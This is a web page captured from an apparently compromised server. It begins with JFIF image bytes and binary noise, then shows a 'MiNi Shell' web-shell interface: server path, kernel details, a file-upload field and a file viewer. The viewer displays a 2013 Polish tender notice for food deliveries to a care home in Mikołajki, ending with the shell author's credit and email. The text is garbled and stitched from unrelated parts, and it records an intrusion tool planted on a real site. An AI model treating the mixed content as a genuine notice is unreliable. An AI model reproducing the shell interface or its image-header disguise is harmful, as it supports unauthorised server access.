JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130116/9161-N-2013.html

<p class="kh_header"><b>Mikołajki: Dostawa artykułów żywnościowych  do Ewangelickiego Domu Opieki ARKA Parafii Ewangelicko-Augsburskiej  Św. Trójcy w Mikołajkach</b><br>
<b>Numer ogłoszenia: 9161 - 2013; data zamieszczenia: 16.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ewangelicki Dom Opieki ARKA Parafii Ewangelicko-Augsburskiej im. Św. Trójcy , Plac Kościelny 5A, 11-730 Mikołajki, woj. warmińsko-mazurskie, tel. 87 4216-811, faks 87 4215-049.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dompomocy.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Ewangelicki Dom Opieki.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych  do Ewangelickiego Domu Opieki ARKA Parafii Ewangelicko-Augsburskiej  Św. Trójcy w Mikołajkach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów żywnościowych  do Ewangelickiego Domu Opieki ARKA Parafii Ewangelicko-Augsburskiej  Św. Trójcy w Mikołajkach w okresie od 01 marca 2013 do 28 lutego 2014 roku zgodnie z  wykazem zamieszczonym w grupach I- VI.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6, 03.11.00.00-5, 15.50.00.00-3, 03.14.25.00-3, 15.10.00.00-9, 15.11.20.00-6, 15.22.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczególnych warunków</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczególnych warunków</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczególnych warunków</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczególnych warunków</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczególnych warunków</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dompomocy.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ewangelicki Dom Opieki ARKA Parafii Ewangelicko-Augsburskiej Św.Trójcy Plac Kościelny 5A, 11-730 Mikołajki - księgowość.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.01.2013 godzina 08:30, miejsce: Ewangelicki Dom Opieki ARKA Parafii Ewangelicko-Augsburskiej Św.Trójcy Plac Kościelny 5A, 11-730 Mikołajki - księgowość.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bułka tarta 500g
szt

150
Bułka drożdżowa 100g
szt

42
Bułka drożdżowa z marmoladą 100g
Szt

110
Bułka grahamka 100 g
Szt

1200
Bułka poznańska 90g
Szt.

1750
Bułka maślana 80g
Szt

360
Chleb tostowy pszenny 500g krojony
szt

40
Chleb razowy krojony 450g
szt

780
Chleb ziarnisty krojony 600g
szt

5
Chleb orkiszowy 500g krojony
szt

570
Chleb zwykły krojony 1kg
Szt

6250
Drożdże 500g
Kg

10
Eklerki 100g
Szt

250
Pączek z marmoladą
Szt

350.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> owoce i warzywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Arbuz
kg

219
Banan
Kg

750
Botwina pęczek
szt

80
Brzoskwinie
kg

6
Buraki czerwone
kg.

750
Cebula
Kg

1 000
Czosnek główka
szt

200
Czosnek główka
kg

10
Cytryna
Kg

360
Gruszki 
Kg

60
Fasola szparagowa
kg

20
Grejpfrut
Kg

410
Jabłka
Kg

1 830
Kapusta młoda
Szt

300
Kapusta biała
Kg

390
Kapusta czerwona
Kg

120
Kapusta kiszona
Kg

710
Kapusta pekińska
Kg

320
Kalafior
Szt

70
Kiwi
Kg

260
Koper pęczek 50g
Szt

650
Mak niebieski
Kg

2
Marchew młoda
Kg

50
Marchew 
kg

1250
Mandarynka 
Kg

500
Nektarynka
Kg

60
Orzech włoski łuskany
kg

0,5
Ogórek świeży
Kg

720
Ogórki gruntowe
Kg

40
Ogórki małosolne
Kg

10
Ogórki kiszone
Kg

170
Por
Szt

830
Por
Kg

55
Papryka
kg

150
Pomidory 
Kg

1 280
Pamarańcza
Kg

210
Pietruszka korzeń
Kg

10
Pietruszka nać 50g
Szt

300
Pieczarki
Kg

260
Rodzynki 
Kg

1
Rzodkiewka 100g
Szt

135
Rzodkiew biała
Kg

20
Szczypiorek pęczek 50g
Szt

380
Seler
Kg

450
Sałata zielona 
szt

100
Śliwki
Kg

31
Sałata lodowa
Szt

180
Truskawka
Kg

50
Winogrona
Kg

100
Wiśnie
Kg

2
Ziemniak młody
Kg

6270
Ziemniak
Kg

6425
Zestaw do  kiszenia
Szt

10
Grzyby suszone podgrz/borow 50g
Szt

4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.11.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jogurt naturalny 150g
Szt.

1 600
Jogurt owocowy 150g
Szt.

2 600
Jogurt owocowy 500g
Szt.

50
Masło extra 200g
Szt.

50
Mleko słodkie kandyzowane puszka 400ml
Szt.

4
Mleko karton 2% 1l
Szt

300
Maślanka naturalna 1l
Szt.

310
Margaryna extra z masłem 500g Delma lub równoważna
szt

2 600
Margaryna 500g Rama lub równoważna
szt

465
Margaryna Kasia 250g lub równoważna


10
Ser Feta 270g
Szt.

54
Ser topiony kostka 100g
Szt.

150
Serek homogenizowany waniliowy 150g 
Szt.

650
Serek waniliowy Danio 150 g lub równoważny  
Szt.

780
Ser żółty edamski/gouda
Kg

270
Ser wędzony
Kg

12
Ser pleśniowy 125g President Camembert lub równoważny
Szt

110
Serek  typu wiejski 200g
Szt

380
Serek typu wiejski lekki 150g
Szt

40
Serek 135g Twój Smak lub równoważny
Szt

1 100
Serek puszysty 150g Almette lub równoważny
Szt

70
Śmietana 30% 500ml 
Szt

40
Śmietana 18% 400g
Szt

1 610
Twaróg chudy 250g
Szt

490
Twaróg tłusty 250g
Szt

18
Twaróg półtłusty 250g
Szt

40
Twaróg sernikowy 1kg
Szt

14
Valbon brie 200g pleśniowy lub równoważny
Szt

50
Valbon camembert 180g pleśniowy lub równoważny
szt

20
Serek Hochland zegarek lub równoważny 200g
Szt

650.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> jajka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja kurze klasa A waga M
szt

25 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> mięso i wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Baleron wp wędzony
kg

27
Boczek bk surowy
kg

136
Boczek wędzony gotowany
kg

250
Ćwiartki kurczęce tylne schłodzone
kg

730
Filet kurczęcy schłodzony bs
kg

570
Filet z indyka wędzony
kg

14
Flaki wołowe krojone mrożone 0,90
op

83
Głowa surowa wp
kg

11
Golonka konserwowa
kg

118
Golonka surowa tylna wp
kg

80
Golonka w galarecie
kg

55
Gulasz angielski
kg

60
Gulasz angielski 340g
Szt 

30
Indyk faszerowany
kg

70
Jelita cienkie wp
szt

30
Kabanosy drobiowe
kg

10
Karkówka wp bk
kg

280
kaszanka
kg

70
Kiełbasa swojska
kg

100
Kiełbasa biała parzona wp średnio rozdrobniona
kg

30
Kiełbasa jasiuk - kiełbasa wieprzowa grubo rozdrobniona, wędzona, w której100g produktu wytworzono ze 125g mięsa wieprzowego


kg

45,86
Kiełbasa kanapkowa wp
kg

20
Kiełbasa krakowska parzona
kg

100
Kiełbasa madera
kg

140
Kiełbasa parówkowa
kg

260
Kiełbasa pieczona
kg

15
kiełbasa piska
kg

10
Kiełbasa piwna
kg

190
Kiełbasa szynkowa 
kg

140
Kiełbasa szynkowa borowiaka- wędzonka gruborozdrobniona, parzona z mięsa wieprzowego, w której do wyprodukowania 100g produktu użyto 106g mięsa wieprzowego


kg

50
Kiełbasa śląska
kg

300
Kiełbasa ukraińska
kg

10
Kiełbasa z piersi kurczaka
kg

15
Kiełbasa żywiecka sucha
kg

45
Kości wp schabowe
kg

40
Konserwa wp 300g
szt

40
Kura w galarecie
kg

60
Kurczak świeży
kg

270
lunchmeat
kg

40
Łopatka wp bk
kg

550
Metka cebulowa
kg

30
Metka tatarska
szt

25
Metka łososiowa
kg

85
Mielonka śniadaniowa
kg

30
Mielonka tyrolska
kg

130
Mortadela luksusowa
kg

120
Nogi wp
kg

45
Ogonówka wędzona parzona
kg

20
Ozory wp
kg

60
 Parówki Berlinetki
kg

380
Pasztet pieczony wp blaszka
kg

90
Pasztet pieczony drobiowy
kg

20
Pasztet drobiowy 50g
szt

20
Pasztetowa drobiowa
kg

180
Pieczeń czosnkowa
kg

25
Pieczeń litewska
kg

250
Pieczeń rzymska
kg

90
Porcje rosołowe
kg

1330
Podgardle wp surowe
kg

20
Polędwica kanadyjska
kg

30
Polędwica sopocka
kg

180
Polędwica drobiowa
kg

200
Polędwica wiśniowa
kg

50
Przekładaniec grecki
kg

30
Polędwica miodowa
kg

40
Polędwica z warzywami
kg

12
Polędwica wędzona
kg

20
Rolada drobiowa z kurczaka
kg

40
Salami bumerang
kg

60
Salceson włoski
kg

130
Schab pieczony
kg

8
Schab wędzony
kg

30
Schab surowy wp bk
kg

250
Serdelki wp
kg

30
Skrzydła kurczęce schłodzone
kg

600
Słonina wp surowa
kg

40
Smalec wp 200g
szt

480
Szynka bankietowa
kg

20
Szynka wp surowa bk
kg

460
Szynka wp gotowana
kg

130
Szynka wędzona tradycyjna
kg

100
Szynka konserwowa
kg

140
Szynka wędzona z liściem
kg

20
Szynka bohuna wp Gotowana wędzona
kg

80
Szynka chłopska
kg

20
Udziec wołowy-zrazowa górna
kg

45
Wątroba świeża wp
kg

10
Wątroba świeża drobiowa 
kg

90
Żeberka wp paski
kg

280
Żołądki drobiowe świeże
kg

50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Morszczuk filet
Kg

400
Miruna filet
kg

14
Płat śledziowy solony bez skory 4kg
Szt

100
Makrela wędzona
kg

88.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com